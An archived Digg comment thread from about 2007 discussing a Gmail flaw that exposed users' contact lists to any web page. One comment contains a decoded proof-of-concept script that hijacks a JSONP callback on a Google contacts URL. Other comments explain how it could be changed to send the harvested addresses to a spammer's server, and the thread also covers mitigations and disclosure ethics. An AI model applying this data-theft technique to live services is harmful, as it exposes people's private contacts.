What is Digg?Sponsored by HTC
Who knows you better than your phone? view!
youtube.com - See you from the perspective of your phone.
154 Comments
- 47knight, on 10/12/2007, -5/+91Same, over 600 of my contacts were exposed, and most of these are users from my site.
I'm digging this in hopes that Google will fix this. - inactive, on 10/12/2007, -7/+51@47knight
The original site says Google has been notified, but this should give some motivation.
I should also note this is a dupe of the original story which can be found here:
http://digg.com/security/Gmail_Bug_Your_Gmail_Contact_List_is_Being_Expose_to_Spammers
I duped it because I feel it's very irresponsible to link to the actual malicious source. Giving users to choose is more appropriate when exposing potentially thousands of people to it with no warning. Sure he says he's not saving the emails, and he most likely isn't, but it's definitely not worth the risk. - synystar, on 10/12/2007, -1/+41Thank goodness. I was beginning to think that no one cared about my contacts.
- kubix, on 10/12/2007, -5/+38WOW, this is pretty cool, it showed me all of my contacts when I was logged in. This sucks because I am always logged in.
- inactive, on 10/12/2007, -1/+24NoScript appears to stop this from working.
- ShitHappens, on 10/12/2007, -1/+23I think your contacts might care.
- haochi, on 10/12/2007, -1/+22Hi, I am the one that found the bug.
First of all, I am sorry if it causes any inconvenience, or if it make you feel insecure of Gmail. *I apologize*.
The intention that I submitted to Digg was only to Google's attention to fix the bug, since I have contact them for hours, and they have failed to done so. (and the bug hasn't yet be fixed.) I would have never ever think of any one would paste the clear code out, although it's encoded a little, but I know that it's easy to decode - Firefox comes with a cool feature.
Once again, sorry to anyone for any inconvenience and sorry for this new year's gift to Google. - Bartboy919, on 10/12/2007, -4/+22Hopefully this is fixed quickly, I know many people who rely on Gmail other than traditional pop mail.
- toppgun, on 10/12/2007, -0/+16it said my email was xxxxxxx@xxxxxx.com even though it really is yyyyyy@gmail.com
its good to an extent, it got most of my contact list but it missed a few and it incorrectly identified me - jonmon6691, on 10/12/2007, -4/+19WOW, some great news to start '07
- dainBramage, on 10/12/2007, -1/+15Hmmm, maybe Gmail really is still in BETA!
- norbiu, on 10/12/2007, -7/+19You are acting weird.
- mentholmoose, on 10/12/2007, -1/+13Shouldn't be too much of a problem for me, because I have no friends, and therefore, no contacts. Woohoo.
- kd5ftn, on 10/12/2007, -1/+13Yikes! I'll stick to using my gmail via pop3!
- kalleanka, on 10/12/2007, -4/+14"For security reasons the code use in this example has been, err, encoded."
And here is the script decoded. :)
Edit: replace [ with <
[script>
//Google pwned
function google(a){
var emails;
emails = "[ol>"
emails += "[li>"+a.Body.Contacts[0].Email+" [font color='red'>[--- Your email[/font>[/li>"
for(i=1;i[a.Body.Contacts.length;i++){
emails += "[li>"+a.Body.Contacts[i].Email+"[/li>";
}
emails += "[/ol>"
document.write(emails);
}
[/script>
[script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">[/script> - adolfojp, on 10/12/2007, -1/+10I wonder if diggers response would have been as mild as this had this happened to MS hotmail.
- tommajor, on 10/12/2007, -4/+12so disable javascript except on trusted sites.
- M4v3R, on 10/12/2007, -0/+7This is a Javascript code, but it could easily save your data by sending it via AJAX or Iframe form to a PHP script. I've checked the code and it doesn't, so You can sleep calmly.
- nikolai, on 10/12/2007, -0/+7http://www.google.com/notebook/contacts?out=js&callback=asdf does the same thing so I'll block that one too for the time being
- kalleanka, on 10/12/2007, -0/+6@kubix:
This is NOT fixed. It still works. - headzoo, on 10/12/2007, -0/+6That's kind of a problem though. Google (not so wisely) chose to use a global login. So for those of us using other Google features, like the personalized home page, logging out of GMail also means logging out of those services. That's probably half the reason why most people just stay logged in.
I imagine email harvesters will have a field day with this. - sishgupta, on 10/12/2007, -0/+6It got "my email" wrong but the rest worked. A workaround (till its fixed) to this is to always log out of gmail before using any other sites.
- konig12, on 10/12/2007, -1/+7Does it matter? Any client script could send the information to a server.
- M4v3R, on 10/12/2007, -0/+5It should work in *every* browser that supports and has Javascript turned on.
- centic, on 10/12/2007, -2/+7well.. thats upsetting
- MrSunshine, on 10/12/2007, -0/+5People in hospitals, public transportation, security...
- zcreem, on 10/12/2007, -0/+5It is not fixed this exploit is still open and needs closing.
The topic and post are both accurate and valid, not to mention of a lot more value than most here. - gklitt, on 10/12/2007, -2/+7Ah, Steve Gibson's "dont use scripting" advice comes in handy again.
- Progranism, on 10/12/2007, -3/+8Here's how it works:
The GMail page mentioned:
http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999
Is a javascript file that calls the function "google" with an array of all your contacts. What this hack does is declare the function "google" and then include that JS file. Simple as that. - kuza55, on 10/12/2007, -1/+5@Freddy36
What about URLs which look like http://docs.google.com/data/contacts?max=99999&out=js&show=ALL&psort=Affinity&callback=google
That won't do it, you need to block http://docs.google.com/data/contacts?* but then a bunch of Google stuff might stop working.
Also, did you guys know Google also provides it in XMl form? http://docs.google.com/data/contacts?out=xml aren't they nice, :p Don't worry the xml output isn't exploitable (unless you can somehow get a non-restrictive crossdomain.xml type file up there somewhere....), :p - neuros, on 10/12/2007, -1/+5@toppgun
it incorrectly identified me, too. thought I was my own mother. that... would be a little too weird for me. - JamesWilson, on 10/12/2007, -0/+4It'd be easy for them to fix this, just check for the referer, make sure it is gmail.
- gabeN, on 10/12/2007, -0/+4It's a y2k7 bug...
- jonmon6691, on 10/12/2007, -1/+5Are we sure this isnt just client side script or does the server have access to the addresses?
- m3mn0n, on 10/12/2007, -4/+81. Everyone should get the NoScript extension for Firefox. Disable javascript globally and then only allow select sites the ability to run JS in your browser. That will fix this security hole and many others.
2. This is Ajax security gone bad. I wouldn't be surprised if many other web 2.0 sites that passes sensitive data via Ajax had this sort of a security issue.
3. To the idiots that are posting code on how to exploit this.... STFU! This is an un-patched security hole and spreading around code only makes this issue worse.
4. The fact that this article links to the exploitable data is bad enough. We didn't need to see that, that only helps people wanting to steal data know what file to use. All the public needed to know was a security hole exists and Google has been notified. FFS... whoever blogged this seriously needs to take some lessons from the big companies who find/report on Windows security holes.
Do you see those guys posting code and linking to resources to help hackers? - gravis86, on 10/12/2007, -0/+4...And yet another reason to use NoScript...
- zcreem, on 10/12/2007, -0/+4Not true I cleared my cache and it still leaks.
- AngryBoy, on 10/12/2007, -0/+4I suspect you're going to get buried for asking this, but an honest question deserves and honest answer.
Take a look at the non obfuscated posted exploit above. See the line that says "document.write(emails);"? All this code is doing is printing your contact list to the current window. Like you said, no big deal, right? Well, by just changing this one line, someone could post all of your contacts to a list instead. You wouldn't even know they did it. Then after collecting contact lists from several gmail users, they could sell that list for a pretty penny to some spammers. Think about it... almost everyone on your contact list is a real person you talk to, not just junk addresses. These kinds of email list get top dollar from spammers. - inactive, on 10/12/2007, -2/+5Actually this is my blog and I posted directly in the Digg comments where I found it, and why I duped the post. The source was the malicious content! There is no reason to send Digg users to something potentially dangerous with no warning...
- MrSunshine, on 10/12/2007, -0/+3"December 31st, 2006"
It's 1.1. here and can still access the Javascript. - frunkie, on 10/12/2007, -0/+3It didn't work for me...I believe it's fixed now
http://www.engadget.com/2007/01/01/gmail-bug-exposes-your-mail-account-to-spammers/ - haochi, on 10/12/2007, -0/+3Well, if you use other Google services that requires login, it will do the same trick. :)
- bertboerland, on 10/12/2007, -0/+3wowsers, the "retrospective perditions of 2007" by http://www.heise-security.co.uk/articles/83058 is already done with this part
they wrote a document in 2006 as if it was 2007 and did the security highlights of that "past" year. Guess what:"
the private mails of thousands of GMail users could be accessed via the search front-end for at least one hour.
Well, not exact right but to see that this year started with compromising all contacts is bad enough.
BTW: what ever happened to giving a vendor two weeks to fix it before going public with an exploit? I mean 1/2 an hour! that's absurd, even for the best security team in the world. I think the guy was just "hits horny" and not driven by making the web more secure. - JamesWilson, on 10/12/2007, -0/+3Another option is to encrypt all the data based on a key that is known by the gmail session and decrypt it client-side.
Another possible fix is to not hand out the contact list without a unique token passed in the querystring. - markthegoth, on 10/12/2007, -1/+4what about safari?
- jeriqo, on 10/12/2007, -0/+3It works in any browser designed after 1990.
- kuza55, on 10/12/2007, -2/+4This whole comment is directed at m3mn0n's post:
@point 3:
Oh noes, people are giving out information, it must be suppressed, or at least thats what you seem to be saying. Can anyone else see something wrong with that, or is it just me? Seriously though anyone who can modify this code to steal your email addresses could deobfuscate it. All that providing the code and explanation of how it worked did was give those who can't a greater understanding of what NOT to do when writing code.
Sure, it could have been posted afterwards, but almost no-one wants to read about something which has been patched. And frankly I'm sure thats what most people who post content are interested in - readership.
And please don't call people idiots when they clearly aren't. They might not share your moral convictions about disclosing information, but that certainly doesn't make them idiots.
@ point 4:
Ok, you didn't need to see it, but I certainly did. And saying that you should do what the "big companies" do is just silly, "big companies" have completely different goal - they have a product or service to sell, and their job is to convince you that they can perform a service better than anyone else, and that their products are the best, and they have the best people working on your problems, etc. Whereas bloggers want to post things which interest, and frankly posting details is much more interesting than posting that there is a flaw.
@ "All the public needed to know ..."
Frankly, I think that your desire to supress information is worrying, but I'm completely sure that there's no way of changing your views on that, so I'm not going to bother trying. -
Show 51 - 100 of 160 discussions
© Digg Inc. 2009
— Content created and posted by Digg users is